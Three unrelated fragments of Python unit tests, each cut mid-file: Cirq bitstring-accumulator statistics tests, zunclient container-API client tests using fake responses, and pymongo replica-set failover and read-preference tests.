bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
chunksizes = np.asarray([4])
timestamps = np.asarray([datetime.datetime.now()])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
settings = list(
cw.observables_to_settings(
[cirq.Z(a) * cirq.Z(b) * 7, cirq.Z(a) * 5, cirq.Z(b) * 3], qubits=[a, b]
)
)
meas_spec = _MeasurementSpec(settings[0], {})
return {
'meas_spec': meas_spec,
'simul_settings': settings,
'qubit_to_index': qubit_to_index,
'bitstrings': bitstrings,
'chunksizes': chunksizes,
'timestamps': timestamps,
}
def test_bitstring_accumulator_stats():
kwargs = _get_ZZ_Z_Z_bsa_constructor_args()
settings = kwargs['simul_settings']
a, b = kwargs['qubit_to_index']
bsa = cw.BitstringAccumulator(**kwargs)
# There are three observables, each with mean 0 because the four 2-bit
# strings contain a) equal numbers of 0s and 1s in the first position,
# b) equal numbers of 0s and 1s in the second position, and c) equal
# numbers of even- and odd-parity pairs.
np.testing.assert_allclose([0, 0, 0], bsa.means())
# Covariance: Sum[(x - xbar)(y - ybar)] / (N - 1)
# where xbar and ybar are 0, per above. Each individual observed value
# is +-1, so (x - xbar)(y - ybar) is +-1 (neglecting observable
# coefficients). For off-diagonal elements, there are two +1 and two -1
# terms for each entry, so the total contribution is zero and the matrix
# is diagonal.
should_be = np.array([[4 * 7**2, 0, 0], [0, 4 * 5**2, 0], [0, 0, 4 * 3**2]])
should_be = should_be / (4 - 1) # covariance formula
should_be = should_be / 4 # cov of the distribution of sample mean
np.testing.assert_allclose(should_be, bsa.covariance())
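# Worked numbers (illustrative sketch): the diagonal of `should_be` is
# [4 * 49, 4 * 25, 4 * 9] = [196, 100, 36]; dividing by (4 - 1) and then by 4
# gives approximately [16.33, 8.33, 3.0] for the variances of the three
# sample means.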
for setting, var in zip(settings, [4 * 7**2, 4 * 5**2, 4 * 3**2]):
np.testing.assert_allclose(0, bsa.mean(setting))
np.testing.assert_allclose(var / 4 / (4 - 1), bsa.variance(setting))
np.testing.assert_allclose(np.sqrt(var / 4 / (4 - 1)), bsa.stderr(setting))
bad_obs = [cirq.X(a) * cirq.X(b)]
bad_setting = list(cw.observables_to_settings(bad_obs, qubits=[a, b]))[0]
with pytest.raises(ValueError):
bsa.mean(bad_setting)
def test_bitstring_accumulator_stats_2():
bitstrings = np.array([[0, 0], [0, 0], [1, 1], [1, 1]], np.uint8)
chunksizes = np.asarray([4])
timestamps = np.asarray([datetime.datetime.now()])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
settings = list(cw.observables_to_settings([cirq.Z(a) * 5, cirq.Z(b) * 3], qubits=[a, b]))
meas_spec = _MeasurementSpec(settings[0], {})
bsa = cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=settings,
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
# There are two observables, each with mean 0 because the four 2-bit
# strings contain equal numbers of 0s and 1s in a) the first position
# and b) the second position.
np.testing.assert_allclose([0, 0], bsa.means())
# Covariance: Sum[(x - xbar)(y - ybar)] / (N - 1)
# where xbar and ybar are 0, per above. Each individual observed value
# is +-1, so (x - xbar)(y - ybar) is +-1 (neglecting observable
# coefficients). In this case, the measurements are perfectly correlated.
should_be = 4 * np.array([[5 * 5, 5 * 3], [3 * 5, 3 * 3]])
should_be = should_be / (4 - 1) # covariance formula
should_be = should_be / 4 # cov of the distribution of sample mean
np.testing.assert_allclose(should_be, bsa.covariance())
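# Worked numbers (illustrative sketch): every bitstring here has equal bits,
# so the Z(a) and Z(b) values always agree in sign and the covariance matrix
# is fully correlated: 4 * [[25, 15], [15, 9]] / 3 / 4 is approximately
# [[8.33, 5.0], [5.0, 3.0]].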
for setting, var in zip(settings, [4 * 5**2, 4 * 3**2]):
np.testing.assert_allclose(0, bsa.mean(setting))
np.testing.assert_allclose(var / 4 / (4 - 1), bsa.variance(setting))
np.testing.assert_allclose(np.sqrt(var / 4 / (4 - 1)), bsa.stderr(setting))
def test_bitstring_accumulator_errors():
q0, q1 = cirq.LineQubit.range(2)
settings = cw.observables_to_settings(
[cirq.X(q0), cirq.Y(q0), cirq.Z(q0), cirq.Z(q0) * cirq.Z(q1)], qubits=[q0, q1]
)
grouped_settings = cw.group_settings_greedy(settings)
max_setting = list(grouped_settings.keys())[0]
simul_settings = grouped_settings[max_setting]
with pytest.raises(ValueError):
bsa = cw.BitstringAccumulator(
meas_spec=_MeasurementSpec(max_setting, {}),
simul_settings=simul_settings,
qubit_to_index={q0: 0, q1: 1},
bitstrings=np.array([[0, | |
# zunclient/tests/unit/v1/test_containers.py
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from six.moves.urllib import parse
import testtools
from testtools import matchers
from zunclient.common import utils as zun_utils
from zunclient import exceptions
from zunclient.tests.unit import utils
from zunclient.v1 import containers
CONTAINER1 = {'id': '1234',
'uuid': '36e527e4-6d03-4eda-9443-904424043741',
'name': 'test1',
'image_pull_policy': 'never',
'image': 'cirros',
'command': 'sh -c "echo hello"',
'cpu': '1',
'memory': '256',
'environment': {'hostname': 'zunsystem'},
'workdir': '/',
'labels': {'label1': 'foo'},
'hints': {'hint1': 'bar'},
'restart_policy': 'no',
'security_groups': ['test'],
'auto_remove': True,
'runtime': 'runc',
'hostname': 'testhost',
'disk': '20',
'auto_heal': False,
'privileged': False,
'healthcheck': {}
}
CONTAINER2 = {'id': '1235',
'uuid': 'c7f9da0f-581b-4586-8d0d-a6c894822165',
'name': 'test2',
'image_pull_policy': 'ifnotpresent',
'image': 'cirros',
'command': 'sleep 100000000',
'cpu': '1',
'memory': '256',
'environment': {'hostname': 'zunsystem'},
'workdir': '/',
'labels': {'label2': 'foo'},
'hints': {'hint2': 'bar'},
'restart_policy': 'on-failure:5',
'security_groups': ['test'],
'auto_remove': False,
'runtime': 'runc',
'hostname': 'testhost',
'auto_heal': False,
'privileged': True,
'healthcheck': {}
}
NETWORK1 = {'net_id': '99e90853-e1fd-4c57-a116-9e335deaa592',
'port_id': '83f39a10-45c8-4463-a274-5a7cda3e6c97',
'fixed_ips': [{
'ip_address': '10.0.0.7', 'version': 4,
'subnet_id': '5899aa85-c98f-4d1d-bc8f-99fed7bde5b9'}]
}
CREATE_CONTAINER1 = copy.deepcopy(CONTAINER1)
del CREATE_CONTAINER1['id']
del CREATE_CONTAINER1['uuid']
force_delete1 = False
force_delete2 = True
all_projects = True
signal = "SIGTERM"
name = "new-name"
timeout = 10
tty_height = "56"
tty_width = "121"
path = "/tmp/test.txt"
data = "/tmp/test.tar"
repo = "repo-test"
tag = "tag-test"
security_group = "testsg"
fake_responses = {
'/v1/containers':
{
'GET': (
{},
{'containers': [CONTAINER1, CONTAINER2]},
),
'POST': (
{},
CREATE_CONTAINER1,
),
},
'/v1/containers/?limit=2':
{
'GET': (
{},
{'containers': [CONTAINER1, CONTAINER2]},
),
},
'/v1/containers/?marker=%s' % CONTAINER2['uuid']:
{
'GET': (
{},
{'containers': [CONTAINER1, CONTAINER2]},
),
},
'/v1/containers/?limit=2&marker=%s' % CONTAINER2['uuid']:
{
'GET': (
{},
{'containers': [CONTAINER1, CONTAINER2]},
),
},
'/v1/containers/?sort_dir=asc':
{
'GET': (
{},
{'containers': [CONTAINER1, CONTAINER2]},
),
},
'/v1/containers/?sort_key=uuid':
{
'GET': (
{},
{'containers': [CONTAINER1, CONTAINER2]},
),
},
'/v1/containers/?sort_key=uuid&sort_dir=desc':
{
'GET': (
{},
{'containers': [CONTAINER1, CONTAINER2]},
),
},
'/v1/containers/%s' % CONTAINER1['id']:
{
'GET': (
{},
CONTAINER1
),
},
'/v1/containers/%s' % CONTAINER1['name']:
{
'GET': (
{},
CONTAINER1
),
},
'/v1/containers/%s/start' % CONTAINER1['id']:
{
'POST': (
{},
None,
),
},
'/v1/containers/%s?force=%s' % (CONTAINER1['id'], force_delete1):
{
'DELETE': (
{},
None,
),
},
'/v1/containers/%s?force=%s' % (CONTAINER1['id'], force_delete2):
{
'DELETE': (
{},
None,
),
},
'/v1/containers/%s?all_projects=%s' % (CONTAINER1['id'], all_projects):
{
'DELETE': (
{},
None,
),
},
'/v1/containers/%s/stop?timeout=10' % CONTAINER1['id']:
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/reboot?timeout=10' % CONTAINER1['id']:
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/pause' % CONTAINER1['id']:
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/unpause' % CONTAINER1['id']:
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/logs?%s'
% (CONTAINER1['id'], parse.urlencode({'stdout': True, 'stderr': True,
'timestamps': False, 'tail': 'all',
'since': None})):
{
'GET': (
{},
None,
),
},
'/v1/containers/%s/execute?%s'
% (CONTAINER1['id'], parse.urlencode({'command': CONTAINER1['command']})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/kill?%s' % (CONTAINER1['id'],
parse.urlencode({'signal': signal})):
{
'POST': (
{},
None,
),
},
'/v1/containers?run=true':
{
'POST': (
{},
CREATE_CONTAINER1,
),
},
'/v1/containers/%s/rename?%s' % (CONTAINER1['id'],
parse.urlencode({'name': name})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/attach' % CONTAINER1['id']:
{
'GET': (
{},
None,
),
},
'/v1/containers/%s/resize?w=%s&h=%s'
% (CONTAINER1['id'], tty_width, tty_height):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/resize?h=%s&w=%s'
% (CONTAINER1['id'], tty_height, tty_width):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/top?ps_args=None' % (CONTAINER1['id']):
{
'GET': (
{},
None,
),
},
'/v1/containers/%s/get_archive?%s'
% (CONTAINER1['id'], parse.urlencode({'path': path})):
{
'GET': (
{},
{'data': data},
),
},
'/v1/containers/%s/put_archive?%s'
% (CONTAINER1['id'], parse.urlencode({'path': path})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/stats?%s'
% (CONTAINER1['id'], parse.urlencode({'decode': False,
'stream': False})):
{
'GET': (
{},
None,
),
},
'/v1/containers/%s/commit?%s'
% (CONTAINER1['id'], parse.urlencode({'repository': repo,
'tag': tag})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/add_security_group?%s'
% (CONTAINER1['id'], parse.urlencode({'name': security_group})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/network_detach?%s'
% (CONTAINER1['id'], parse.urlencode({'network': 'neutron_network'})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/network_attach?%s'
% (CONTAINER1['id'], parse.urlencode({'network': 'neutron_network'})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/network_list'
% (CONTAINER1['id']):
{
'GET': (
{},
{'networks': NETWORK1},
),
},
'/v1/containers/%s/remove_security_group?%s'
% (CONTAINER1['id'], parse.urlencode({'name': security_group})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/rebuild?image=cirros'
% (CONTAINER1['id']):
{
'POST': (
{},
None,
),
},
}
class ContainerManagerTest(testtools.TestCase):
def setUp(self):
super(ContainerManagerTest, self).setUp()
self.api = utils.FakeAPI(fake_responses)
self.mgr = containers.ContainerManager(self.api)
def test_container_create(self):
containers = self.mgr.create(**CREATE_CONTAINER1)
expect = [
('POST', '/v1/containers', {}, CREATE_CONTAINER1)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_container_create_fail(self):
create_container_fail = copy.deepcopy(CREATE_CONTAINER1)
create_container_fail["wrong_key"] = "wrong"
self.assertRaisesRegex(exceptions.InvalidAttribute,
("Key must be in %s" %
','.join(containers.CREATION_ATTRIBUTES)),
self.mgr.create, **create_container_fail)
self.assertEqual([], self.api.calls)
def test_containers_list(self):
containers = self.mgr.list()
expect = [
('GET', '/v1/containers', {}, None),
]
self.assertEqual(expect, self.api.calls)
self.assertThat(containers, matchers.HasLength(2))
def _test_containers_list_with_filters(self, limit=None, marker=None,
sort_key=None, sort_dir=None,
expect=[]):
containers_filter = self.mgr.list(limit=limit, marker=marker,
sort_key=sort_key,
sort_dir=sort_dir)
self.assertEqual(expect, self.api.calls)
self.assertThat(containers_filter, matchers.HasLength(2))
def test_containers_list_with_limit(self):
expect = [
('GET', '/v1/containers/?limit=2', {}, None),
]
self._test_containers_list_with_filters(
limit=2,
expect=expect)
def test_containers_list_with_marker(self):
expect = [
('GET', '/v1/containers/?marker=%s' % CONTAINER2['uuid'],
{}, None),
]
self._test_containers_list_with_filters(
marker=CONTAINER2['uuid'],
expect=expect)
def test_containers_list_with_marker_limit(self):
expect = [
('GET', '/v1/containers/?limit=2&marker=%s' % CONTAINER2['uuid'],
{}, None),
]
self._test_containers_list_with_filters(
limit=2, marker=CONTAINER2['uuid'],
expect=expect)
def test_container_list_with_sort_dir(self):
expect = [
('GET', '/v1/containers/?sort_dir=asc', {}, None),
]
self._test_containers_list_with_filters(
sort_dir='asc',
expect=expect)
def test_container_list_with_sort_key(self):
expect = [
('GET', '/v1/containers/?sort_key=uuid', {}, None),
]
self._test_containers_list_with_filters(
sort_key='uuid',
expect=expect)
def test_container_list_with_sort_key_dir(self):
expect = [
('GET', '/v1/containers/?sort_key=uuid&sort_dir=desc', {}, None),
]
self._test_containers_list_with_filters(
sort_key='uuid', sort_dir='desc',
expect=expect)
def test_container_show_by_id(self):
container = self.mgr.get(CONTAINER1['id'])
expect = [
('GET', '/v1/containers/%s' % CONTAINER1['id'], {}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertEqual(CONTAINER1['name'], container.name)
self.assertEqual(CONTAINER1['uuid'], container.uuid)
def test_container_show_by_name(self):
container = self.mgr.get(CONTAINER1['name'])
expect = [
('GET', '/v1/containers/%s' % CONTAINER1['name'], {}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertEqual(CONTAINER1['name'], container.name)
self.assertEqual(CONTAINER1['uuid'], container.uuid)
def test_containers_start(self):
containers = self.mgr.start(CONTAINER1['id'])
expect = [
('POST', '/v1/containers/%s/start' % CONTAINER1['id'],
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_containers_delete(self):
containers = self.mgr.delete(CONTAINER1['id'], force=force_delete1)
expect = [
('DELETE', '/v1/containers/%s?force=%s' % (CONTAINER1['id'],
force_delete1),
{}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_containers_delete_with_force(self):
containers = self.mgr.delete(CONTAINER1['id'], force=force_delete2)
expect = [
('DELETE', '/v1/containers/%s?force=%s' % (CONTAINER1['id'],
force_delete2),
{}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_containers_delete_with_all_projects(self):
containers = self.mgr.delete(CONTAINER1['id'],
all_projects=all_projects)
expect = [
('DELETE', '/v1/containers/%s?all_projects=%s' % (CONTAINER1['id'],
all_projects),
{}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_containers_stop(self):
containers = self.mgr.stop(CONTAINER1['id'], timeout)
expect = [
('POST', '/v1/containers/%s/stop?timeout=10' % CONTAINER1['id'],
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_containers_restart(self):
containers = self.mgr.restart(CONTAINER1['id'], timeout)
expect = [
('POST', '/v1/containers/%s/reboot?timeout=10' % CONTAINER1['id'],
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_containers_pause(self):
containers = self.mgr.pause(CONTAINER1['id'])
expect = [
('POST', '/v1/containers/%s/pause' % CONTAINER1['id'],
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_containers_unpause(self):
containers = self.mgr.unpause(CONTAINER1['id'])
expect = [
('POST', '/v1/containers/%s/unpause' % CONTAINER1['id'],
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_containers_logs(self):
containers = self.mgr.logs(CONTAINER1['id'], stdout=True, stderr=True,
timestamps=False, tail='all', since=None)
expect = [
('GET', '/v1/containers/%s/logs?%s'
% (CONTAINER1['id'], parse.urlencode({'stdout': True,
'stderr': True,
'timestamps': False,
'tail': 'all',
'since': None})),
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_containers_execute(self):
containers = self.mgr.execute(CONTAINER1['id'],
command=CONTAINER1['command'])
expect = [
('POST', '/v1/containers/%s/execute?%s'
% (CONTAINER1['id'], parse.urlencode({'command':
CONTAINER1['command']})),
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_containers_kill(self):
containers = self.mgr.kill(CONTAINER1['id'], signal)
expect = [
('POST', '/v1/containers/%s/kill?%s'
% (CONTAINER1['id'], parse.urlencode({'signal': signal})),
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_container_run(self):
containers = self.mgr.run(**CREATE_CONTAINER1)
expect = [
('POST', '/v1/containers?run=true', {}, CREATE_CONTAINER1)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_container_run_fail(self):
run_container_fail = copy.deepcopy(CREATE_CONTAINER1)
run_container_fail["wrong_key"] = "wrong"
self.assertRaisesRegex(exceptions.InvalidAttribute,
("Key must be in %s" %
','.join(containers.CREATION_ATTRIBUTES)),
self.mgr.run, **run_container_fail)
self.assertEqual([], self.api.calls)
def test_containers_rename(self):
containers = self.mgr.rename(CONTAINER1['id'], name)
expect = [
('POST', '/v1/containers/%s/rename?%s'
% (CONTAINER1['id'], parse.urlencode({'name': name})),
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_containers_attach(self):
containers = self.mgr.attach(CONTAINER1['id'])
expect = [
('GET', '/v1/containers/%s/attach' % CONTAINER1['id'],
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_containers_resize(self):
containers = self.mgr.resize(CONTAINER1['id'], tty_width, tty_height)
expects = []
expects.append([
('POST', '/v1/containers/%s/resize?w=%s&h=%s'
% (CONTAINER1['id'], tty_width, tty_height),
{'Content-Length': '0'}, None)
])
expects.append([
('POST', '/v1/containers/%s/resize?h=%s&w=%s'
% (CONTAINER1['id'], tty_height, tty_width),
{'Content-Length': '0'}, None)
])
self.assertTrue(self.api.calls in expects)
self.assertIsNone(containers)
def test_containers_top(self):
containers = self.mgr.top(CONTAINER1['id'])
expect = [
('GET', '/v1/containers/%s/top?ps_args=None' % CONTAINER1['id'],
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_containers_get_archive(self):
response = self.mgr.get_archive(CONTAINER1['id'], path)
expect = [
('GET', '/v1/containers/%s/get_archive?%s'
% (CONTAINER1['id'], parse.urlencode({'path': path})),
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertEqual(zun_utils.decode_file_data(data), response['data'])
def test_containers_put_archive(self):
response = self.mgr.put_archive(CONTAINER1['id'], path, data)
expect = [
('POST', '/v1/containers/%s/put_archive?%s'
% (CONTAINER1['id'], parse.urlencode({'path': path})),
{'Content-Length': '0'},
{'data': zun_utils.encode_file_data(data)})
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(response)
def test_containers_commit(self):
containers = | |
!= c.primary)
self.assertEqual('baz', db.test.find_one({'bar': 'baz'})['bar'])
def tearDown(self):
Monitor._refresh_interval = MONITOR_INTERVAL
super(TestWritesWithFailover, self).tearDown()
class TestReadWithFailover(HATestCase):
def setUp(self):
res = ha_tools.start_replica_set([{}, {}, {}])
self.seed, self.name = res
def test_read_with_failover(self):
c = MongoReplicaSetClient(
self.seed, replicaSet=self.name, use_greenlets=use_greenlets)
self.assertTrue(bool(len(c.secondaries)))
def iter_cursor(cursor):
for _ in cursor:
pass
return True
db = c.pymongo_test
w = len(c.secondaries) + 1
db.test.remove({}, w=w)
# Force replication
db.test.insert([{'foo': i} for i in xrange(10)], w=w)
self.assertEqual(10, db.test.count())
db.read_preference = SECONDARY_PREFERRED
cursor = db.test.find().batch_size(5)
cursor.next()
self.assertEqual(5, cursor._Cursor__retrieved)
self.assertTrue(cursor._Cursor__connection_id in c.secondaries)
ha_tools.kill_primary()
# Primary failure shouldn't interrupt the cursor
self.assertTrue(iter_cursor(cursor))
self.assertEqual(10, cursor._Cursor__retrieved)
class TestReadPreference(HATestCase):
def setUp(self):
members = [
# primary
{'tags': {'dc': 'ny', 'name': 'primary'}},
# secondary
{'tags': {'dc': 'la', 'name': 'secondary'}, 'priority': 0},
# other_secondary
{'tags': {'dc': 'ny', 'name': 'other_secondary'}, 'priority': 0},
]
res = ha_tools.start_replica_set(members)
self.seed, self.name = res
primary = ha_tools.get_primary()
self.primary = _partition_node(primary)
self.primary_tags = ha_tools.get_tags(primary)
# Make sure priority worked
self.assertEqual('primary', self.primary_tags['name'])
self.primary_dc = {'dc': self.primary_tags['dc']}
secondaries = ha_tools.get_secondaries()
(secondary, ) = [
s for s in secondaries
if ha_tools.get_tags(s)['name'] == 'secondary']
self.secondary = _partition_node(secondary)
self.secondary_tags = ha_tools.get_tags(secondary)
self.secondary_dc = {'dc': self.secondary_tags['dc']}
(other_secondary, ) = [
s for s in secondaries
if ha_tools.get_tags(s)['name'] == 'other_secondary']
self.other_secondary = _partition_node(other_secondary)
self.other_secondary_tags = ha_tools.get_tags(other_secondary)
self.other_secondary_dc = {'dc': self.other_secondary_tags['dc']}
self.c = MongoReplicaSetClient(
self.seed, replicaSet=self.name, use_greenlets=use_greenlets)
self.db = self.c.pymongo_test
self.w = len(self.c.secondaries) + 1
self.db.test.remove({}, w=self.w)
self.db.test.insert(
[{'foo': i} for i in xrange(10)], w=self.w)
self.clear_ping_times()
def set_ping_time(self, host, ping_time_seconds):
Member._host_to_ping_time[host] = ping_time_seconds
def clear_ping_times(self):
Member._host_to_ping_time.clear()
def test_read_preference(self):
# We pass through four states:
#
# 1. A primary and two secondaries
# 2. Primary down
# 3. Primary up, one secondary down
# 4. Primary up, all secondaries down
#
# For each state, we verify the behavior of PRIMARY,
# PRIMARY_PREFERRED, SECONDARY, SECONDARY_PREFERRED, and NEAREST
c = MongoReplicaSetClient(
self.seed, replicaSet=self.name, use_greenlets=use_greenlets)
def assertReadFrom(member, *args, **kwargs):
utils.assertReadFrom(self, c, member, *args, **kwargs)
def assertReadFromAll(members, *args, **kwargs):
utils.assertReadFromAll(self, c, members, *args, **kwargs)
def unpartition_node(node):
host, port = node
return '%s:%s' % (host, port)
# To make the code terser, copy hosts into local scope
primary = self.primary
secondary = self.secondary
other_secondary = self.other_secondary
bad_tag = {'bad': 'tag'}
# 1. THREE MEMBERS UP -------------------------------------------------
# PRIMARY
assertReadFrom(primary, PRIMARY)
# PRIMARY_PREFERRED
# Trivial: mode and tags both match
assertReadFrom(primary, PRIMARY_PREFERRED, self.primary_dc)
# Secondary matches but not primary, choose primary
assertReadFrom(primary, PRIMARY_PREFERRED, self.secondary_dc)
# Chooses primary, ignoring tag sets
assertReadFrom(primary, PRIMARY_PREFERRED, self.primary_dc)
# Chooses primary, ignoring tag sets
assertReadFrom(primary, PRIMARY_PREFERRED, bad_tag)
assertReadFrom(primary, PRIMARY_PREFERRED, [bad_tag, {}])
# SECONDARY
assertReadFromAll([secondary, other_secondary], SECONDARY)
# SECONDARY_PREFERRED
assertReadFromAll([secondary, other_secondary], SECONDARY_PREFERRED)
# Multiple tags
assertReadFrom(secondary, SECONDARY_PREFERRED, self.secondary_tags)
# Fall back to primary if it's the only one matching the tags
assertReadFrom(primary, SECONDARY_PREFERRED, {'name': 'primary'})
# No matching secondaries
assertReadFrom(primary, SECONDARY_PREFERRED, bad_tag)
# Fall back from non-matching tag set to matching set
assertReadFromAll([secondary, other_secondary],
SECONDARY_PREFERRED, [bad_tag, {}])
assertReadFrom(other_secondary,
SECONDARY_PREFERRED, [bad_tag, {'dc': 'ny'}])
# NEAREST
self.clear_ping_times()
assertReadFromAll([primary, secondary, other_secondary], NEAREST)
assertReadFromAll([primary, other_secondary],
NEAREST, [bad_tag, {'dc': 'ny'}])
self.set_ping_time(primary, 0)
self.set_ping_time(secondary, .03) # 30 ms
self.set_ping_time(other_secondary, 10)
# Nearest member, no tags
assertReadFrom(primary, NEAREST)
# Tags override nearness
assertReadFrom(primary, NEAREST, {'name': 'primary'})
assertReadFrom(secondary, NEAREST, self.secondary_dc)
# Make secondary fast
self.set_ping_time(primary, .03) # 30 ms
self.set_ping_time(secondary, 0)
assertReadFrom(secondary, NEAREST)
# Other secondary fast
self.set_ping_time(secondary, 10)
self.set_ping_time(other_secondary, 0)
assertReadFrom(other_secondary, NEAREST)
# High secondaryAcceptableLatencyMS, should read from all members
assertReadFromAll(
[primary, secondary, other_secondary],
NEAREST, secondary_acceptable_latency_ms=1000*1000)
self.clear_ping_times()
assertReadFromAll([primary, other_secondary], NEAREST, [{'dc': 'ny'}])
# 2. PRIMARY DOWN -----------------------------------------------------
killed = ha_tools.kill_primary()
# Let monitor notice primary's gone
sleep(2 * MONITOR_INTERVAL)
# PRIMARY
assertReadFrom(None, PRIMARY)
# PRIMARY_PREFERRED
# No primary, choose matching secondary
assertReadFromAll([secondary, other_secondary], PRIMARY_PREFERRED)
assertReadFrom(secondary, PRIMARY_PREFERRED, {'name': 'secondary'})
# No primary or matching secondary
assertReadFrom(None, PRIMARY_PREFERRED, bad_tag)
# SECONDARY
assertReadFromAll([secondary, other_secondary], SECONDARY)
# Only primary matches
assertReadFrom(None, SECONDARY, {'name': 'primary'})
# No matching secondaries
assertReadFrom(None, SECONDARY, bad_tag)
# SECONDARY_PREFERRED
assertReadFromAll([secondary, other_secondary], SECONDARY_PREFERRED)
# Mode and tags both match
assertReadFrom(secondary, SECONDARY_PREFERRED, {'name': 'secondary'})
# NEAREST
self.clear_ping_times()
assertReadFromAll([secondary, other_secondary], NEAREST)
# 3. PRIMARY UP, ONE SECONDARY DOWN -----------------------------------
ha_tools.restart_members([killed])
ha_tools.wait_for_primary()
ha_tools.kill_members([unpartition_node(secondary)], 2)
sleep(5)
ha_tools.wait_for_primary()
self.assertTrue(MongoClient(
unpartition_node(primary), use_greenlets=use_greenlets,
read_preference=PRIMARY_PREFERRED
).admin.command('ismaster')['ismaster'])
sleep(2 * MONITOR_INTERVAL)
# PRIMARY
assertReadFrom(primary, PRIMARY)
# PRIMARY_PREFERRED
assertReadFrom(primary, PRIMARY_PREFERRED)
# SECONDARY
assertReadFrom(other_secondary, SECONDARY)
assertReadFrom(other_secondary, SECONDARY, self.other_secondary_dc)
# Only the down secondary matches
assertReadFrom(None, SECONDARY, {'name': 'secondary'})
# SECONDARY_PREFERRED
assertReadFrom(other_secondary, SECONDARY_PREFERRED)
assertReadFrom(
other_secondary, SECONDARY_PREFERRED, self.other_secondary_dc)
# The secondary matching the tag is down, use primary
assertReadFrom(primary, SECONDARY_PREFERRED, {'name': 'secondary'})
# NEAREST
assertReadFromAll([primary, other_secondary], NEAREST)
assertReadFrom(other_secondary, NEAREST, {'name': 'other_secondary'})
assertReadFrom(primary, NEAREST, {'name': 'primary'})
# 4. PRIMARY UP, ALL SECONDARIES DOWN ---------------------------------
ha_tools.kill_members([unpartition_node(other_secondary)], 2)
self.assertTrue(MongoClient(
unpartition_node(primary), use_greenlets=use_greenlets,
read_preference=PRIMARY_PREFERRED
).admin.command('ismaster')['ismaster'])
# PRIMARY
assertReadFrom(primary, PRIMARY)
# PRIMARY_PREFERRED
assertReadFrom(primary, PRIMARY_PREFERRED)
assertReadFrom(primary, PRIMARY_PREFERRED, self.secondary_dc)
# SECONDARY
assertReadFrom(None, SECONDARY)
assertReadFrom(None, SECONDARY, self.other_secondary_dc)
assertReadFrom(None, SECONDARY, {'dc': 'ny'})
# SECONDARY_PREFERRED
assertReadFrom(primary, SECONDARY_PREFERRED)
assertReadFrom(primary, SECONDARY_PREFERRED, self.secondary_dc)
assertReadFrom(primary, SECONDARY_PREFERRED, {'name': 'secondary'})
assertReadFrom(primary, SECONDARY_PREFERRED, {'dc': 'ny'})
# NEAREST
assertReadFrom(primary, NEAREST)
assertReadFrom(None, NEAREST, self.secondary_dc)
assertReadFrom(None, NEAREST, {'name': 'secondary'})
# Even if primary's slow, still read from it
self.set_ping_time(primary, 100)
assertReadFrom(primary, NEAREST)
assertReadFrom(None, NEAREST, self.secondary_dc)
self.clear_ping_times()
def test_pinning(self):
# To make the code terser, copy modes into local scope
PRIMARY = ReadPreference.PRIMARY
PRIMARY_PREFERRED = ReadPreference.PRIMARY_PREFERRED
SECONDARY = ReadPreference.SECONDARY
SECONDARY_PREFERRED = ReadPreference.SECONDARY_PREFERRED
NEAREST = ReadPreference.NEAREST
c = MongoReplicaSetClient(
self.seed, replicaSet=self.name, use_greenlets=use_greenlets,
auto_start_request=True)
# Verify that changing the mode unpins the member. We'll try it for
# every relevant change of mode.
for mode0, mode1 in permutations(
(PRIMARY, SECONDARY, SECONDARY_PREFERRED, NEAREST), 2
):
# Try reading and then changing modes and reading again, see if we
# read from a different host
for _ in range(1000):
# pin to this host
host = utils.read_from_which_host(c, mode0)
# unpin?
